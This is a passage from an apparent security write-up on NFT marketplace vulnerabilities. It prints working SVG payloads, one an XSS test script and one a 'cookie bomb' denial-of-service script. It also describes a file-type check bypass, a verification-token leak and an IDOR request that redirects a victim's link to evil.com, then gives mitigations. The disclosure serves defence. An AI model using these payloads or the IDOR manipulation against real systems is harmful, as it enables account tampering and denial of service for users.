\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n  \u003Ctitle>XSS\u003C/title>\n  \u003Cscript type=\"text/javascript\">\n   alert(document.domain);\n   \u003C/script>\n \u003C/svg>\n",[36765],{"type":26,"tag":130,"props":36766,"children":36767},{"__ignoreMap":7},[36768,36814,36851,36858,36888,36920,36948,36956,36972],{"type":26,"tag":137,"props":36769,"children":36770},{"class":5559,"line":5560},[36771,36776,36781,36786,36790,36795,36800,36804,36809],{"type":26,"tag":137,"props":36772,"children":36773},{"style":5590},[36774],{"type":32,"value":36775},"\u003C?",{"type":26,"tag":137,"props":36777,"children":36778},{"style":5584},[36779],{"type":32,"value":36780},"xml",{"type":26,"tag":137,"props":36782,"children":36783},{"style":5584},[36784],{"type":32,"value":36785}," version",{"type":26,"tag":137,"props":36787,"children":36788},{"style":5590},[36789],{"type":32,"value":289},{"type":26,"tag":137,"props":36791,"children":36792},{"style":6837},[36793],{"type":32,"value":36794},"\"1.0\"",{"type":26,"tag":137,"props":36796,"children":36797},{"style":5584},[36798],{"type":32,"value":36799}," encoding",{"type":26,"tag":137,"props":36801,"children":36802},{"style":5590},[36803],{"type":32,"value":289},{"type":26,"tag":137,"props":36805,"children":36806},{"style":6837},[36807],{"type":32,"value":36808},"\"UTF-8\"",{"type":26,"tag":137,"props":36810,"children":36811},{"style":5590},[36812],{"type":32,"value":36813},"?>\n",{"type":26,"tag":137,"props":36815,"children":36816},{"class":5559,"line":5412},[36817,36822,36827,36832,36837,36842,36847],{"type":26,"tag":137,"props":36818,"children":36819},{"style":5590},[36820],{"type":32,"value":36821},"\u003C!",{"type":26,"tag":137,"props":36823,"children":36824},{"style":5584},[36825],{"type":32,"value":36826},"DOCTYPE",{"type":26,"tag":137,"props":36828,"children":36829},{"style":5584},[36830],{"type":32,"value":36831}," svg",{"type":26,"tag":137,"props":36833,"children":36834},{"style":5584},[36835],{"type":32,"value":36836}," PUBLIC",{"type":26,"tag":137,"props":36838,"children":36839},{"style":6837},[36840],{"type":32,"value":36841}," \"-//W3C//DTD SVG 1.1//EN\"",{"type":26,"tag":137,"props":36843,"children":36844},{"style":6837},[36845],{"type":32,"value":36846}," \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"",{"type":26,"tag":137,"props":36848,"children":36849},{"style":5590},[36850],{"type":32,"value":8577},{"type":26,"tag":137,"props":36852,"children":36853},{"class":5559,"line":5417},[36854],{"type":26,"tag":137,"props":36855,"children":36856},{"emptyLinePlaceholder":18},[36857],{"type":32,"value":6276},{"type":26,"tag":137,"props":36859,"children":36860},{"class":5559,"line":5642},[36861,36865,36870,36875,36879,36884],{"type":26,"tag":137,"props":36862,"children":36863},{"style":34971},[36864],{"type":32,"value":11305},{"type":26,"tag":137,"props":36866,"children":36867},{"style":5573},[36868],{"type":32,"value":36869},"svg",{"type":26,"tag":137,"props":36871,"children":36872},{"style":5584},[36873],{"type":32,"value":36874}," xmlns",{"type":26,"tag":137,"props":36876,"children":36877},{"style":5590},[36878],{"type":32,"value":289},{"type":26,"tag":137,"props":36880,"children":36881},{"style":6837},[36882],{"type":32,"value":36883},"\"http://www.w3.org/2000/svg\"",{"type":26,"tag":137,"props":36885,"children":36886},{"style":34971},[36887],{"type":32,"value":8577},{"type":26,"tag":137,"props":36889,"children":36890},{"class":5559,"line":5745},[36891,36895,36900,36904,36908,36912,36916],{"type":26,"tag":137,"props":36892,"children":36893},{"style":34971},[36894],{"type":32,"value":34990},{"type":26,"tag":137,"props":36896,"children":36897},{"style":5573},[36898],{"type":32,"value":36899},"title",{"type":26,"tag":137,"props":36901,"children":36902},{"style":34971},[36903],{"type":32,"value":13052},{"type":26,"tag":137,"props":36905,"children":36906},{"style":5601},[36907],{"type":32,"value":33832},{"type":26,"tag":137,"props":36909,"children":36910},{"style":34971},[36911],{"type":32,"value":35025},{"type":26,"tag":137,"props":36913,"children":36914},{"style":5573},[36915],{"type":32,"value":36899},{"type":26,"tag":137,"props":36917,"children":36918},{"style":34971},[36919],{"type":32,"value":8577},{"type":26,"tag":137,"props":36921,"children":36922},{"class":5559,"line":5850},[36923,36927,36931,36935,36939,36944],{"type":26,"tag":137,"props":36924,"children":36925},{"style":34971},[36926],{"type":32,"value":34990},{"type":26,"tag":137,"props":36928,"children":36929},{"style":5573},[36930],{"type":32,"value":35011},{"type":26,"tag":137,"props":36932,"children":36933},{"style":5584},[36934],{"type":32,"value":35136},{"type":26,"tag":137,"props":36936,"children":36937},{"style":5590},[36938],{"type":32,"value":289},{"type":26,"tag":137,"props":36940,"children":36941},{"style":6837},[36942],{"type":32,"value":36943},"\"text/javascript\"",{"type":26,"tag":137,"props":36945,"children":36946},{"style":34971},[36947],{"type":32,"value":8577},{"type":26,"tag":137,"props":36949,"children":36950},{"class":5559,"line":5878},[36951],{"type":26,"tag":137,"props":36952,"children":36953},{"style":5601},[36954],{"type":32,"value":36955},"   alert(document.domain);\n",{"type":26,"tag":137,"props":36957,"children":36958},{"class":5559,"line":5891},[36959,36964,36968],{"type":26,"tag":137,"props":36960,"children":36961},{"style":34971},[36962],{"type":32,"value":36963},"   \u003C/",{"type":26,"tag":137,"props":36965,"children":36966},{"style":5573},[36967],{"type":32,"value":35011},{"type":26,"tag":137,"props":36969,"children":36970},{"style":34971},[36971],{"type":32,"value":8577},{"type":26,"tag":137,"props":36973,"children":36974},{"class":5559,"line":5909},[36975,36980,36984],{"type":26,"tag":137,"props":36976,"children":36977},{"style":34971},[36978],{"type":32,"value":36979}," \u003C/",{"type":26,"tag":137,"props":36981,"children":36982},{"style":5573},[36983],{"type":32,"value":36869},{"type":26,"tag":137,"props":36985,"children":36986},{"style":34971},[36987],{"type":32,"value":8577},{"type":26,"tag":35,"props":36989,"children":36990},{},[36991,36993,37000],{"type":32,"value":36992},"Although some marketplaces restrict the upload of SVG files, we discovered a way to bypass these checks. One particular instance involved the ",{"type":26,"tag":41,"props":36994,"children":36997},{"href":36995,"rel":36996},"https://xtingles.com/",[45],[36998],{"type":32,"value":36999},"xtingles Marketplace",{"type":32,"value":470},{"type":26,"tag":35,"props":37002,"children":37003},{},[37004],{"type":32,"value":37005},"Even though the file extension was validated based on its name, the content type was not checked. By renaming a file with an allowed extension and inserting an SVG file with the content type \"svg+xml,\", we were able to successfully upload the SVG file.",{"type":26,"tag":35,"props":37007,"children":37008},{},[37009],{"type":32,"value":37010},"Below, we show you how we did it.",{"type":26,"tag":35,"props":37012,"children":37013},{},[37014],{"type":32,"value":37015},"Request when the original SVG was sent, showing it is not accepted as format:",{"type":26,"tag":35,"props":37017,"children":37018},{},[37019],{"type":26,"tag":2210,"props":37020,"children":37022},{"alt":7,"src":37021},"/posts/web2-bug-repellant-instructions/svg-1.png",[],{"type":26,"tag":35,"props":37024,"children":37025},{},[37026],{"type":32,"value":37027},"After changing the extension inside the file name.",{"type":26,"tag":35,"props":37029,"children":37030},{},[37031],{"type":26,"tag":2210,"props":37032,"children":37034},{"alt":7,"src":37033},"/posts/web2-bug-repellant-instructions/svg-2.png",[],{"type":26,"tag":118,"props":37036,"children":37038},{"id":37037},"svgs-return",[37039],{"type":32,"value":37040},"SVGs Return",{"type":26,"tag":35,"props":37042,"children":37043},{},[37044],{"type":32,"value":37045},"We'll give credit where it's due. Some marketplaces mitigate the impact of XSS by storing images in IPFS, Amazon S3 buckets, or CloudFront.",{"type":26,"tag":35,"props":37047,"children":37048},{},[37049],{"type":32,"value":37050},"Unfortunately, this mitigation is still susceptible to a \"cookie bomb\" attack.",{"type":26,"tag":35,"props":37052,"children":37053},{},[37054],{"type":32,"value":37055},"This type of attack overwhelms a web server with an excessive number of cookies and can be used to achieve a Denial of Service (DoS), preventing users from accessing the file on the third-party service.",{"type":26,"tag":5512,"props":37057,"children":37061},{"className":37058,"code":37059,"language":37060,"meta":7,"style":7},"language-jsx shiki shiki-themes slack-dark","\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n  \u003Ctitle>XSS\u003C/title>\n  \u003Cscript type=\"text/javascript\">\n   var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n   var Set_Cookie = Array(10000).join('a');\n\n   for (var i = 1; i \u003C 99; i++) {\n    document.cookie = 'Cookie' + i + '=' + Set_Cookie + ';Domain=' + Take_Domain;\n   }\n   \u003C/script>\n \u003C/svg>\n","jsx",[37062],{"type":26,"tag":130,"props":37063,"children":37064},{"__ignoreMap":7},[37065,37104,37135,37142,37169,37200,37227,37235,37243,37250,37262,37337,37345,37360],{"type":26,"tag":137,"props":37066,"children":37067},{"class":5559,"line":5560},[37068,37072,37076,37080,37084,37088,37092,37096,37100],{"type":26,"tag":137,"props":37069,"children":37070},{"style":5590},[37071],{"type":32,"value":36775},{"type":26,"tag":137,"props":37073,"children":37074},{"style":5584},[37075],{"type":32,"value":36780},{"type":26,"tag":137,"props":37077,"children":37078},{"style":5584},[37079],{"type":32,"value":36785},{"type":26,"tag":137,"props":37081,"children":37082},{"style":5590},[37083],{"type":32,"value":289},{"type":26,"tag":137,"props":37085,"children":37086},{"style":6837},[37087],{"type":32,"value":36794},{"type":26,"tag":137,"props":37089,"children":37090},{"style":5584},[37091],{"type":32,"value":36799},{"type":26,"tag":137,"props":37093,"children":37094},{"style":5590},[37095],{"type":32,"value":289},{"type":26,"tag":137,"props":37097,"children":37098},{"style":6837},[37099],{"type":32,"value":36808},{"type":26,"tag":137,"props":37101,"children":37102},{"style":5590},[37103],{"type":32,"value":36813},{"type":26,"tag":137,"props":37105,"children":37106},{"class":5559,"line":5412},[37107,37111,37115,37119,37123,37127,37131],{"type":26,"tag":137,"props":37108,"children":37109},{"style":5590},[37110],{"type":32,"value":36821},{"type":26,"tag":137,"props":37112,"children":37113},{"style":5584},[37114],{"type":32,"value":36826},{"type":26,"tag":137,"props":37116,"children":37117},{"style":5584},[37118],{"type":32,"value":36831},{"type":26,"tag":137,"props":37120,"children":37121},{"style":5584},[37122],{"type":32,"value":36836},{"type":26,"tag":137,"props":37124,"children":37125},{"style":6837},[37126],{"type":32,"value":36841},{"type":26,"tag":137,"props":37128,"children":37129},{"style":6837},[37130],{"type":32,"value":36846},{"type":26,"tag":137,"props":37132,"children":37133},{"style":5590},[37134],{"type":32,"value":8577},{"type":26,"tag":137,"props":37136,"children":37137},{"class":5559,"line":5417},[37138],{"type":26,"tag":137,"props":37139,"children":37140},{"emptyLinePlaceholder":18},[37141],{"type":32,"value":6276},{"type":26,"tag":137,"props":37143,"children":37144},{"class":5559,"line":5642},[37145,37149,37153,37157,37161,37165],{"type":26,"tag":137,"props":37146,"children":37147},{"style":34971},[37148],{"type":32,"value":11305},{"type":26,"tag":137,"props":37150,"children":37151},{"style":5573},[37152],{"type":32,"value":36869},{"type":26,"tag":137,"props":37154,"children":37155},{"style":5584},[37156],{"type":32,"value":36874},{"type":26,"tag":137,"props":37158,"children":37159},{"style":5590},[37160],{"type":32,"value":289},{"type":26,"tag":137,"props":37162,"children":37163},{"style":6837},[37164],{"type":32,"value":36883},{"type":26,"tag":137,"props":37166,"children":37167},{"style":34971},[37168],{"type":32,"value":8577},{"type":26,"tag":137,"props":37170,"children":37171},{"class":5559,"line":5745},[37172,37176,37180,37184,37188,37192,37196],{"type":26,"tag":137,"props":37173,"children":37174},{"style":34971},[37175],{"type":32,"value":34990},{"type":26,"tag":137,"props":37177,"children":37178},{"style":5573},[37179],{"type":32,"value":36899},{"type":26,"tag":137,"props":37181,"children":37182},{"style":34971},[37183],{"type":32,"value":13052},{"type":26,"tag":137,"props":37185,"children":37186},{"style":5601},[37187],{"type":32,"value":33832},{"type":26,"tag":137,"props":37189,"children":37190},{"style":34971},[37191],{"type":32,"value":35025},{"type":26,"tag":137,"props":37193,"children":37194},{"style":5573},[37195],{"type":32,"value":36899},{"type":26,"tag":137,"props":37197,"children":37198},{"style":34971},[37199],{"type":32,"value":8577},{"type":26,"tag":137,"props":37201,"children":37202},{"class":5559,"line":5850},[37203,37207,37211,37215,37219,37223],{"type":26,"tag":137,"props":37204,"children":37205},{"style":34971},[37206],{"type":32,"value":34990},{"type":26,"tag":137,"props":37208,"children":37209},{"style":5573},[37210],{"type":32,"value":35011},{"type":26,"tag":137,"props":37212,"children":37213},{"style":5584},[37214],{"type":32,"value":35136},{"type":26,"tag":137,"props":37216,"children":37217},{"style":5590},[37218],{"type":32,"value":289},{"type":26,"tag":137,"props":37220,"children":37221},{"style":6837},[37222],{"type":32,"value":36943},{"type":26,"tag":137,"props":37224,"children":37225},{"style":34971},[37226],{"type":32,"value":8577},{"type":26,"tag":137,"props":37228,"children":37229},{"class":5559,"line":5878},[37230],{"type":26,"tag":137,"props":37231,"children":37232},{"style":5601},[37233],{"type":32,"value":37234},"   var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n",{"type":26,"tag":137,"props":37236,"children":37237},{"class":5559,"line":5891},[37238],{"type":26,"tag":137,"props":37239,"children":37240},{"style":5601},[37241],{"type":32,"value":37242},"   var Set_Cookie = Array(10000).join('a');\n",{"type":26,"tag":137,"props":37244,"children":37245},{"class":5559,"line":5909},[37246],{"type":26,"tag":137,"props":37247,"children":37248},{"emptyLinePlaceholder":18},[37249],{"type":32,"value":6276},{"type":26,"tag":137,"props":37251,"children":37252},{"class":5559,"line":5930},[37253,37258],{"type":26,"tag":137,"props":37254,"children":37255},{"style":5601},[37256],{"type":32,"value":37257},"   for (var i = 1; i \u003C 99; i++) ",{"type":26,"tag":137,"props":37259,"children":37260},{"style":5573},[37261],{"type":32,"value":13471},{"type":26,"tag":137,"props":37263,"children":37264},{"class":5559,"line":5939},[37265,37270,37274,37279,37283,37288,37293,37297,37301,37306,37310,37315,37319,37324,37328,37333],{"type":26,"tag":137,"props":37266,"children":37267},{"style":5584},[37268],{"type":32,"value":37269},"    document",{"type":26,"tag":137,"props":37271,"children":37272},{"style":5590},[37273],{"type":32,"value":470},{"type":26,"tag":137,"props":37275,"children":37276},{"style":5584},[37277],{"type":32,"value":37278},"cookie",{"type":26,"tag":137,"props":37280,"children":37281},{"style":5590},[37282],{"type":32,"value":35507},{"type":26,"tag":137,"props":37284,"children":37285},{"style":6837},[37286],{"type":32,"value":37287},"'Cookie'",{"type":26,"tag":137,"props":37289,"children":37290},{"style":5590},[37291],{"type":32,"value":37292}," + ",{"type":26,"tag":137,"props":37294,"children":37295},{"style":5584},[37296],{"type":32,"value":506},{"type":26,"tag":137,"props":37298,"children":37299},{"style":5590},[37300],{"type":32,"value":37292},{"type":26,"tag":137,"props":37302,"children":37303},{"style":6837},[37304],{"type":32,"value":37305},"'='",{"type":26,"tag":137,"props":37307,"children":37308},{"style":5590},[37309],{"type":32,"value":37292},{"type":26,"tag":137,"props":37311,"children":37312},{"style":5584},[37313],{"type":32,"value":37314},"Set_Cookie",{"type":26,"tag":137,"props":37316,"children":37317},{"style":5590},[37318],{"type":32,"value":37292},{"type":26,"tag":137,"props":37320,"children":37321},{"style":6837},[37322],{"type":32,"value":37323},"';Domain='",{"type":26,"tag":137,"props":37325,"children":37326},{"style":5590},[37327],{"type":32,"value":37292},{"type":26,"tag":137,"props":37329,"children":37330},{"style":5584},[37331],{"type":32,"value":37332},"Take_Domain",{"type":26,"tag":137,"props":37334,"children":37335},{"style":5590},[37336],{"type":32,"value":5604},{"type":26,"tag":137,"props":37338,"children":37339},{"class":5559,"line":6191},[37340],{"type":26,"tag":137,"props":37341,"children":37342},{"style":5573},[37343],{"type":32,"value":37344},"   }\n",{"type":26,"tag":137,"props":37346,"children":37347},{"class":5559,"line":6208},[37348,37352,37356],{"type":26,"tag":137,"props":37349,"children":37350},{"style":34971},[37351],{"type":32,"value":36963},{"type":26,"tag":137,"props":37353,"children":37354},{"style":5573},[37355],{"type":32,"value":35011},{"type":26,"tag":137,"props":37357,"children":37358},{"style":34971},[37359],{"type":32,"value":8577},{"type":26,"tag":137,"props":37361,"children":37362},{"class":5559,"line":6225},[37363,37367,37371],{"type":26,"tag":137,"props":37364,"children":37365},{"style":34971},[37366],{"type":32,"value":36979},{"type":26,"tag":137,"props":37368,"children":37369},{"style":5573},[37370],{"type":32,"value":36869},{"type":26,"tag":137,"props":37372,"children":37373},{"style":34971},[37374],{"type":32,"value":8577},{"type":26,"tag":35,"props":37376,"children":37377},{},[37378],{"type":32,"value":37379},"As a result, we're able to prevent the user from loading images.",{"type":26,"tag":92,"props":37381,"children":37383},{"id":37382},"authentication",[37384],{"type":32,"value":37385},"Authentication",{"type":26,"tag":35,"props":37387,"children":37388},{},[37389],{"type":26,"tag":762,"props":37390,"children":37391},{},[37392,37394,37401],{"type":32,"value":37393},"The door could not be heard slamming; they had probably left it open, as is the custom in homes where a ",{"type":26,"tag":41,"props":37395,"children":37398},{"href":37396,"rel":37397},"https://auth0.com/docs/get-started/identity-fundamentals/authentication-and-authorization",[45],[37399],{"type":32,"value":37400},"great misfortune has occured",{"type":32,"value":470},{"type":26,"tag":118,"props":37403,"children":37405},{"id":37404},"verification-token-leakage",[37406],{"type":32,"value":37407},"Verification Token Leakage",{"type":26,"tag":35,"props":37409,"children":37410},{},[37411],{"type":32,"value":37412},"When a user signs up for a service or creates an account that requires email verification, the system generates a unique token and sends it to the provided email address.",{"type":26,"tag":35,"props":37414,"children":37415},{},[37416],{"type":32,"value":37417},"This token is usually a random combination of letters, numbers, and symbols that are designed to be difficult to guess. The user is then instructed to verify their email by clicking a link that was sent to their inbox. However, if the email verification flow is not implemented correctly, it can result in security vulnerabilities.",{"type":26,"tag":35,"props":37419,"children":37420},{},[37421,37426],{"type":26,"tag":762,"props":37422,"children":37423},{},[37424],{"type":32,"value":37425},"Proof of Concept",{"type":32,"value":37427},"\nWhile reviewing the Tensor website source code, we found a feature that allowed us to send verification emails to any email with a spoofed verification link. This could potentially result in the leakage of email verification codes, enabling an attacker to associate a victim’s email with their own account.",{"type":26,"tag":35,"props":37429,"children":37430},{},[37431],{"type":32,"value":37432},"Here's the breakdown.",{"type":26,"tag":35,"props":37434,"children":37435},{},[37436],{"type":32,"value":37437},"First, we send the verification link to a user's email:",{"type":26,"tag":33941,"props":37439,"children":37440},{"style":33943},[37441],{"type":26,"tag":2210,"props":37442,"children":37446},{"src":37443,"alt":37444,"style":37445},"/posts/web2-bug-repellant-instructions/token-leakage.png","token-leakage","max-height:650px;",[],{"type":26,"tag":35,"props":37448,"children":37449},{},[37450],{"type":32,"value":37451},"If the user clicks on the spoofed URL, their token will be stolen, allowing the attacker to link their account to the victim’s email.",{"type":26,"tag":118,"props":37453,"children":37455},{"id":37454},"idor",[37456],{"type":32,"value":37457},"IDOR",{"type":26,"tag":35,"props":37459,"children":37460},{},[37461],{"type":26,"tag":762,"props":37462,"children":37463},{},[37464,37466,37473],{"type":32,"value":37465},"As Gregor Samsa awoke one morning from uneasy dreams he found himself transformed in his bed into a gigantic ",{"type":26,"tag":41,"props":37467,"children":37470},{"href":37468,"rel":37469},"https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html",[45],[37471],{"type":32,"value":37472},"insect",{"type":32,"value":470},{"type":26,"tag":35,"props":37475,"children":37476},{},[37477,37479,37485],{"type":32,"value":37478},"During a security assessment of the ",{"type":26,"tag":41,"props":37480,"children":37483},{"href":37481,"rel":37482},"https://rocki.com",[45],[37484],{"type":32,"value":33879},{"type":32,"value":37486},", a critical vulnerability known as an Insecure Direct Object Reference (IDOR) was identified within the social link modification functionality. Exploiting this vulnerability enables an attacker to modify the social media links of other users without proper authorization.",{"type":26,"tag":35,"props":37488,"children":37489},{},[37490],{"type":32,"value":37491},"The specific vulnerable endpoint was identified as a POST request to /api/user/modifySocialLink, which is responsible for handling requests to update social media links associated with user accounts. This endpoint requires two parameters: \"newLink\" to specify the desired social media link and \"id\" to indicate the user's ID.",{"type":26,"tag":35,"props":37493,"children":37494},{},[37495],{"type":32,"value":37496},"Now, to exploit this vulnerability, an attacker can intercept or modify the request being sent to the \"POST /api/user/modifySocialLink\" endpoint. By manipulating the \"id\" parameter with the user ID of another user, the attacker is able to bypass proper authorization checks and modify the social media link associated with the targeted user's account.",{"type":26,"tag":35,"props":37498,"children":37499},{},[37500,37502,37508,37510,37515],{"type":32,"value":37501},"Here is an example of a request that modifies another user's social media link to ",{"type":26,"tag":130,"props":37503,"children":37505},{"className":37504},[],[37506],{"type":32,"value":37507},"https://evil.com/",{"type":32,"value":37509},". To achieve this, we simply changed the ",{"type":26,"tag":130,"props":37511,"children":37513},{"className":37512},[],[37514],{"type":32,"value":6077},{"type":32,"value":37516}," field value to one that belongs to another user:",{"type":26,"tag":35,"props":37518,"children":37519},{},[37520],{"type":26,"tag":2210,"props":37521,"children":37523},{"alt":7,"src":37522},"/posts/web2-bug-repellant-instructions/idor-1.png",[],{"type":26,"tag":35,"props":37525,"children":37526},{},[37527],{"type":32,"value":37528},"The following screenshot is the response to our request:",{"type":26,"tag":35,"props":37530,"children":37531},{},[37532],{"type":26,"tag":2210,"props":37533,"children":37535},{"alt":7,"src":37534},"/posts/web2-bug-repellant-instructions/idor-2.png",[],{"type":26,"tag":92,"props":37537,"children":37539},{"id":37538},"preventative-action-steps-for-marketplaces",[37540],{"type":26,"tag":84,"props":37541,"children":37542},{},[37543],{"type":32,"value":37544},"Preventative Action Steps for Marketplaces",{"type":26,"tag":35,"props":37546,"children":37547},{},[37548],{"type":32,"value":37549},"To mitigate the vulnerabilities we’ve discussed, NFT marketplaces must prioritize the implementation of robust security measures. Below, we outline potential mitigations that can help platforms enhance their security posture and protect users and their valuable digital assets.",{"type":26,"tag":35,"props":37551,"children":37552},{},[37553,37555,37561,37563,37569],{"type":32,"value":37554},"First and foremost, NFT marketplaces should prioritize security by strengthening their input validation and output encoding processes. This can be done by encoding untrusted data with HTML entities in backend or using ",{"type":26,"tag":130,"props":37556,"children":37558},{"className":37557},[],[37559],{"type":32,"value":37560},"innerText",{"type":32,"value":37562}," instead of ",{"type":26,"tag":130,"props":37564,"children":37566},{"className":37565},[],[37567],{"type":32,"value":37568},"innerHTML",{"type":32,"value":37570}," in client-side:",{"type":26,"tag":5512,"props":37572,"children":37574},{"className":33958,"code":37573,"language":33960,"meta":7,"style":7},"document.getElementById('nftCollectionName').innerText = nftCollectionName;\n",[37575],{"type":26,"tag":130,"props":37576,"children":37577},{"__ignoreMap":7},[37578],{"type":26,"tag":137,"props":37579,"children":37580},{"class":5559,"line":5560},[37581,37585,37589,37594,37598,37603,37607,37611,37615,37620],{"type":26,"tag":137,"props":37582,"children":37583},{"style":5584},[37584],{"type":32,"value":35303},{"type":26,"tag":137,"props":37586,"children":37587},{"style":5601},[37588],{"type":32,"value":470},{"type":26,"tag":137,"props":37590,"children":37591},{"style":5682},[37592],{"type":32,"value":37593},"getElementById",{"type":26,"tag":137,"props":37595,"children":37596},{"style":5601},[37597],{"type":32,"value":165},{"type":26,"tag":137,"props":37599,"children":37600},{"style":6837},[37601],{"type":32,"value":37602},"'nftCollectionName'",{"type":26,"tag":137,"props":37604,"children":37605},{"style":5601},[37606],{"type":32,"value":4437},{"type":26,"tag":137,"props":37608,"children":37609},{"style":5584},[37610],{"type":32,"value":37560},{"type":26,"tag":137,"props":37612,"children":37613},{"style":5590},[37614],{"type":32,"value":5593},{"type":26,"tag":137,"props":37616,"children":37617},{"style":5584},[37618],{"type":32,"value":37619}," nftCollectionName",{"type":26,"tag":137,"props":37621,"children":37622},{"style":5601},[37623],{"type":32,"value":5604},{"type":26,"tag":35,"props":37625,"children":37626},{},[37627],{"type":32,"value":37628},"However, rendering HTML or markdown user input is intended. In these cases, dangerous HTML tags need to be validated and sanitized via consolidated libraries like DomPurify:",{"type":26,"tag":5512,"props":37630,"children":37632},{"className":33958,"code":37631,"language":33960,"meta":7,"style":7},"var sanitizedInput = DOMPurify.sanitize(userInput);\n",[37633],{"type":26,"tag":130,"props":37634,"children":37635},{"__ignoreMap":7},[37636],{"type":26,"tag":137,"props":37637,"children":37638},{"class":5559,"line":5560},[37639,37644,37649,37653,37658,37662,37667,37671,37676],{"type":26,"tag":137,"props":37640,"children":37641},{"style":5573},[37642],{"type":32,"value":37643},"var",{"type":26,"tag":137,"props":37645,"children":37646},{"style":5584},[37647],{"type":32,"value":37648}," sanitizedInput",{"type":26,"tag":137,"props":37650,"children":37651},{"style":5590},[37652],{"type":32,"value":5593},{"type":26,"tag":137,"props":37654,"children":37655},{"style":5584},[37656],{"type":32,"value":37657}," DOMPurify",{"type":26,"tag":137,"props":37659,"children":37660},{"style":5601},[37661],{"type":32,"value":470},{"type":26,"tag":137,"props":37663,"children":37664},{"style":5682},[37665],{"type":32,"value":37666},"sanitize",{"type":26,"tag":137,"props":37668,"children":37669},{"style":5601},[37670],{"type":32,"value":165},{"type":26,"tag":137,"props":37672,"children":37673},{"style":5584},[37674],{"type":32,"value":37675},"userInput",{"type":26,"tag":137,"props":37677,"children":37678},{"style":5601},[37679],{"type":32,"value":6430},{"type":26,"tag":35,"props":37681,"children":37682},{},[37683,37685,37692],{"type":32,"value":37684},"This can effectively mitigate the risk of XSS attacks. With that being said, implementing security measures such as ",{"type":26,"tag":41,"props":37686,"children":37689},{"href":37687,"rel":37688},"https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP",[45],[37690],{"type":32,"value":37691},"Content-Security-Policy",{"type":32,"value":37693}," (CSP) will help ensure that generated content is rendered safely, without compromising the platform's security.",{"type":26,"tag":35,"props":37695,"children":37696},{},[37697],{"type":32,"value":37698},"Furthermore, a key step is for NFT marketplaces to establish strict file upload policies. By conducting thorough checks on file types and content, platforms can prevent the upload of potentially malicious SVG files. Validating both the file extension and content type will significantly reduce the risk of SVG-based XSS attacks, ensuring a safer user experience.",{"type":26,"tag":35,"props":37700,"children":37701},{},[37702,37704,37711],{"type":32,"value":37703},"Another precaution is to implement secure redirect mechanisms. By implementing a server-side allow-list of trusted domains, NFT marketplaces can prevent open redirect vulnerabilities. This ensures that users are directed only to trusted and intended domains, safeguarding them from potential phishing or malicious attacks where the authentication code is leaked. Here we are showing an example of a secure redirect by applying an ",{"type":26,"tag":41,"props":37705,"children":37708},{"href":37706,"rel":37707},"https://www.techtarget.com/whatis/definition/whitelist",[45],[37709],{"type":32,"value":37710},"allow-list",{"type":32,"value":37712}," :",{"type":26,"tag":5512,"props":37714,"children":37716},{"className":33958,"code":37715,"language":33960,"meta":7,"style":7},"const allowDomains = ['https://allowed-domain'];\nif (!allowDomains.includes(domain)) {\n  throw new ApolloError('invalid domain');\n}\n",[37717],{"type":26,"tag":130,"props":37718,"children":37719},{"__ignoreMap":7},[37720,37749,37791,37821],{"type":26,"tag":137,"props":37721,"children":37722},{"class":5559,"line":5560},[37723,37727,37732,37736,37740,37745],{"type":26,"tag":137,"props":37724,"children":37725},{"style":5573},[37726],{"type":32,"value":12244},{"type":26,"tag":137,"props":37728,"children":37729},{"style":5584},[37730],{"type":32,"value":37731}," allowDomains",{"type":26,"tag":137,"props":37733,"children":37734},{"style":5590},[37735],{"type":32,"value":5593},{"type":26,"tag":137,"props":37737,"children":37738},{"style":5601},[37739],{"type":32,"value":25612},{"type":26,"tag":137,"props":37741,"children":37742},{"style":6837},[37743],{"type":32,"value":37744},"'https://allowed-domain'",{"type":26,"tag":137,"props":37746,"children":37747},{"style":5601},[37748],{"type":32,"value":34169},{"type":26,"tag":137,"props":37750,"children":37751},{"class":5559,"line":5412},[37752,37756,37760,37764,37769,37773,37778,37782,37786],{"type":26,"tag":137,"props":37753,"children":37754},{"style":5610},[37755],{"type":32,"value":18171},{"type":26,"tag":137,"props":37757,"children":37758},{"style":5601},[37759],{"type":32,"value":4625},{"type":26,"tag":137,"props":37761,"children":37762},{"style":5590},[37763],{"type":32,"value":23215},{"type":26,"tag":137,"props":37765,"children":37766},{"style":5584},[37767],{"type":32,"value":37768},"allowDomains",{"type":26,"tag":137,"props":37770,"children":37771},{"style":5601},[37772],{"type":32,"value":470},{"type":26,"tag":137,"props":37774,"children":37775},{"style":5682},[37776],{"type":32,"value":37777},"includes",{"type":26,"tag":137,"props":37779,"children":37780},{"style":5601},[37781],{"type":32,"value":165},{"type":26,"tag":137,"props":37783,"children":37784},{"style":5584},[37785],{"type":32,"value":35313},{"type":26,"tag":137,"props":37787,"children":37788},{"style":5601},[37789],{"type":32,"value":37790},")) {\n",{"type":26,"tag":137,"props":37792,"children":37793},{"class":5559,"line":5417},[37794,37799,37803,37808,37812,37817],{"type":26,"tag":137,"props":37795,"children":37796},{"style":5610},[37797],{"type":32,"value":37798},"  throw",{"type":26,"tag":137,"props":37800,"children":37801},{"style":5573},[37802],{"type":32,"value":34528},{"type":26,"tag":137,"props":37804,"children":37805},{"style":5682},[37806],{"type":32,"value":37807}," ApolloError",{"type":26,"tag":137,"props":37809,"children":37810},{"style":5601},[37811],{"type":32,"value":165},{"type":26,"tag":137,"props":37813,"children":37814},{"style":6837},[37815],{"type":32,"value":37816},"'invalid domain'",{"type":26,"tag":137,"props":37818,"children":37819},{"style":5601},[37820],{"type":32,"value":6430},{"type":26,"tag":137,"props":37822,"children":37823},{"class":5559,"line":5642},[37824],{"type":26,"tag":137,"props":37825,"children":37826},{"style":5601},[37827],{"type":32,"value":6507},{"type":26,"tag":35,"props":37829,"children":37830},{},[37831,37833,37840,37842,37849],{"type":32,"value":37832},"As 